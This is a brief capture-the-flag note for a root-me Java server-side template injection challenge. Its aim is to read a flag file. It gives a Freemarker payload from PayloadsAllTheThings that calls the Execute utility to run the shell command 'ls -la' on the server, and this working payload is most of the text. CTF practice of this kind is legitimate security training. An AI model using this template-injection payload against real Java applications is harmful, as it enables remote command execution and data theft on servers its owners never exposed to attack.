Java: Server-side Template Injection (SSTI)
root-me challenge: Java - Server-side Template Injection: Exploit the vulnerability in order to retrieve the validation password in the file SECRET_FLAG.txt.
PayLoadAllTheThings Freemarker code execution
${"freemarker.template.utility.Execute"?new()("ls -la")}
etcetera.